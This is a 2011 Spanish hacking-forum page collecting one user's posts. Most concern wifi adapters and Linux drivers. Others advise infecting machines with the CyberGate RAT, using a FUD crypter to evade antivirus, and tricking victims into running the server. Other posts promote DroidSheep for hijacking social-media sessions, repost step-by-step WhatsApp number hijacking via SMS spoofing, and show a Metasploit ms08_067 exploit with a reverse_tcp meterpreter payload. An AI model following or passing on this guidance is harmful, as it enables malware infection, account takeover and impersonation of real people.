Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - r0b3r

#1
Dudas y pedidos generales / Re:ayudame a empezar
Noviembre 25, 2011, 05:42:25 AM
Hola, en principio no necesitarias tocar nada del moden. No le hace falta que abras ningún puerto. Ya sabes empieza primero infectando en local a una maquina virtual y le vas pillando el truco. Sobre el RAT prueba con el cybergate ya que mucha gente Lo prefiere y por algo será. Sobre el crypter eso ya es más dificil, tendrás que aprender a hacer mods o confiar en la buena voluntad de algún usuario que comparta uno FUD.
#2
Esto para windows 7 no funciona, por Lo menos yo no he podido con una alfa. La solución que dan es meter un livecd con Linux, utilizar el macchanger y reiniciar la maquina sin dejar de alimentar el adaptador WiFi por medio de un cable de esos que tienen dos  usb conectado uno de ellos a otra fuente de alimentación que no sea el ordenador que reiniciamos. Cuando volvamos después de reiniciar a Win7  se guarda la configuración. Ahora mismo no tengo cable asi que no he podido probar.
#3
Fue aquello efectivamente. Cuando escribí eso es que estaba utilizando una VM con un win ya actualizado. Gracias por la respuesta!!

Tema cerrado.
#4
No me gusta preguntar Lo mismo en varios foros pero ya que no he encontrado respuesta ni solución por mi parte Lo planteó aqui.

Tengo una alfa de 1w y me resulta imposible cambiarle la MAC. He leido tutos que dicen meter un Linux hacer macchanger y después manteniendo alimentada la tarjeta reiniciar win7 y se mantiene la configuración con la MAC cambiada. He probado también todos y cada uno de los programas que cambian la MAC y aunque con xp Lo consiguen con win7 no Lo hacen. He probado también instalar otros drivers para la tarjeta y tampoco.

Alguien que haya pasado por Lo mismo???
#5
Android / DroidSheep
Agosto 30, 2011, 05:47:43 AM
DroidSheep es la versión para android de Firesheep. Es un sniffer que roba sesiones de Facebook, amazon, twitter, etc, de victimas que estén conectadas por wifi a un mismo router.
Soporta OPEN, WEP, WPA and WPA2.





No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#6
Ah pues muchas gracias, la verdad que está muy bien para aprender a analizar malwares ajenos.
#7
Ok, pues buscaremos por mosaico a ver que nos sale. Gracias.
#8
Hola, a ver sí alguno sabe de algún programa de estos que metiendo unas cuantas fotos las coloca para que desde lejos se forme una imagen determinada y de cerca se ven las fotos. Lo he visto alguna vez en algún cartel publicitario. Conoceis alguno? No he encontrado de momento.
#9
Creo que escaneando en modo monitor salen también las redes ocultas.
#10
GNU/Linux / Re:[Video] Curso Backtrack 5 en Español
Agosto 05, 2011, 05:30:55 PM
A sus órdenes comandante! Ya había un tema de esto......
#11
Dudas y pedidos generales / Re:Ejecutar server
Julio 31, 2011, 08:11:43 AM
En todo caso sé podrá descargar automáticamente el server al entrar en el enlace pero ejecutarse..........tendrás que utilizar ING. Social para que la misma víctima lo ejecute.
#12
Batch - Bash / Re:""MSN"" en batch
Julio 14, 2011, 07:18:51 PM
Muy bueno Elle, como dijiste le estas dando duro este verano. Recuerda esas clases de  C que tenemos pendientes. Un saludo máquina.
#13
Sim checker lite

Yo os recomiendo está aplicación que manda un sms a un número que se le diga y un correo electronico si la tarjeta sim es cambiada por otra. Manda la posición del celular. Está en el market y es gratuita.
#14
Seguridad / Re:[Encuesta] Mejor Firewall
Julio 08, 2011, 09:37:59 PM
Siempre he tenido zonealarm y no podría opinar de los demás. Para mi este hace un buen trabajo, consumiendo pocos recursos y muy fácil de configurar.
#15
Los últimos comentarios de la gente que Lo ha probado hacen referencia a que ya no es posible hacerlo de este modo porque tal vez whatsapp haya corregido el error. También es posible que Lo hagan mal porque el autor del post dice que el no Lo ha vuelto a intentar. La cosa era curiosa pq podías dar de alta a un usuario que ya estuviera utilalizando whatsapp, entonces a el le salía un mensaje de error en Su móvil y los mensajes te llegarían a ti hasta que el volviera a darse de alta. Esto Lo comenta el autor del post.

Al final si conseguí conectar la máquina virtual con Android a Internet. Lo tuve que hacer con cable en el ordenador de sobremesa porque con wireless en el portátil no me conectaba no se porque.
#16
Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Aqui os dejo un post de Security By Default. Llega un poco tarde porque por lo visto los de whatsapp ya lo han solucionado si leéis los comentarios de la gente que lo ha probado últimamente. Yo no lo he probado porque aunque he instalado android en vmware no consigo que tenga conexión a internet. Para el que quiera instalar una máquina virtual de android puede bajar la iso de este enlace:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Cómo registrar cualquier número de teléfono en WhatsApp



Seguimos con nuestra campaña de marketing viral sobre WhatsApp, hoy le toca al sistema de registro de usuarios.

En anteriores capítulos de SbD VS WhatsApp hablamos sobre:
Comunicaciones inseguras
Gestión de la información interna

En este post vamos a contar lo fácilmente que se puede registrar en la red WhatsApp cualquier número de teléfono, y cuando digo cualquier número me refiero a un número de teléfono ficticio, tu propio número o el de otra persona (pudiendo enviar mensajes en su nombre y recibir los destinados a el).

El objetivo del post es poder registrar un número de teléfono ficticio dentro del emulador de Android para tener WhatsApp en el PC. Evidentemente lo explicado aquí también sirve para suplantar el número de otra persona, así que tan solo me gustaría reseñar que probablemente hacer eso sea un delito. A partir de aquí ancha es Castilla.

Como todo usuario de WhatsApp sabe, para validar la instalación WhatsApp genera un auto-envío de un sms desde tu número de teléfono que sirve como elemento probatorio de que el número te pertenece, y por tanto, completar el registro en WhatsApp.

Por si este método no fuese confiable o fallase, WhatsApp permite alternativas, en concreto si echamos un vistazo a la FAQ nos encontramos con esto:

Ehmm Significa esto que si yo envío un SMS con un origen arbitrario y en el cuerpo del mensaje pongo un correo, ¿me enviarán a ese correo un pin para registrar ese número? Really ?

Pocas cosas en esta vida son menos fiables que un SMS, falsificar el origen de un mensaje es algo trivial, hay múltiples plataformas online disponibles que permiten hacer eso. A nosotros nos gusta la de No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Esquemáticamente el proceso para registrar un número arbitrario en WhatsApp (probado en un terminal Android y en el emulador) se resume en esto:

-Instalamos la aplicación

-Ponemos como número de teléfono el que deseamos registrar

-Esperamos pacientemente (9 minutos) a que el proceso de validación por auto-sms falle

-Solicitamos el acceso a Pin por llamada

-WhatsApp lanzará el proceso de llamada a un número con prefijo 93, colgamos inmediatamente la llamada ya que no nos sirve de nada (si usamos el emulador esa llamada nunca ser hará, si es un terminal normal, hay que estar atento)

-Hacemos el envío del sms-spoof con origen [Número deseado] destino +44 7900 347295, cuerpo del mensaje un correo electrónico

-Introducimos en WhatsApp el Pin que nos ha llegado por correo

En este vídeo hay una demostración práctica de todo el proceso para registrar un número ficticio dentro de WhatsApp, he escogido un número con un prefijo 682 debido a que, a día de hoy, no se encuentra asignado / en uso por parte de ninguna operadora




Aunque la tentación es dura, (todos tenemos ex-novias/os, enemigos irreconciliables, etc) no hagáis el mal registrando números que pertenezcan a otras personas !

Publicado por Yago Jesus
#17
Bueno pues como alguno ya comentaba al final no me ha hecho falta instalar nada. No andaba y yo lo achacaba a los drivers y al final resulta que le he cambiado el cable que conecta con la usb y eso era, un problema "mecánico". Así que ya esta solucionado, de todas maneras gracias por las respuestas porque aunque ya me salía reconocida al meter en la terminal iwconfig cuando abría en Wicd Network Manager no me salia y es que tenía que configurar la conexión. Ala así que ya funcionando en linux!!!  Gracias y ya me tocará preguntar más cosas por este apartado.
#18
Bueno pues lo que os pongo en el asunto. Tengo una alfa AWUS036NH y claro antes cuando la utilizaba con algun live CD pues no tenía los drivers instalados en linux. Ahora que en un portatil he instalado el BT5 las estoy pasando canutas porque no se como hacerlo. Me he bajado los drivers de la pagina de alfa y me descargo el archivo tar.gz2. Lo descomprimo y me aparece un archivo .tar, miro dentro y encuentro un readme pero nada soy incapaz. ¿alguna orientación?  Os pondría una captura de pantalla con las carpetas que hay dentro del tar pero es que me sale este error al dar a impr pant

There was an error running gnome-screenshot:
Failed to execute child process "gnome-screenshot" (No such file or directory)

Me quiero animar a utilizar linux como OS principal pero es que cuesta bastante olvidarse de dar dos clip a un exe y a correr........(con los peligros que eso con lleva, todo sea dicho....)
#19
Seguí esto:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta    pag 61!

exploit windows/smb/ms08_067_netapi

payload windows/meterpreter/reverse_tcp.

La maquina atacante tiene BlackTrack 4 y la victima Wxp
#20
Hola, estaba siguiendo un turorial sobre msf y todo va perfecto hasta que lanzo el exploit y dice que completado pero que no puede crear sesion. A que se puede deber???

msf exploit(ms08_067_netapi) > exploit

  • Started reverse handler on 192.168.6.137:4444
  • Automatically detecting the target...
  • Fingerprint: Windows XP Service Pack 3 - lang:Spanish
  • Selected Target: Windows XP SP3 Spanish (NX)
  • Attempting to trigger the vulnerability...
  • Exploit completed, but no session was created.
    msf exploit(ms08_067_netapi) >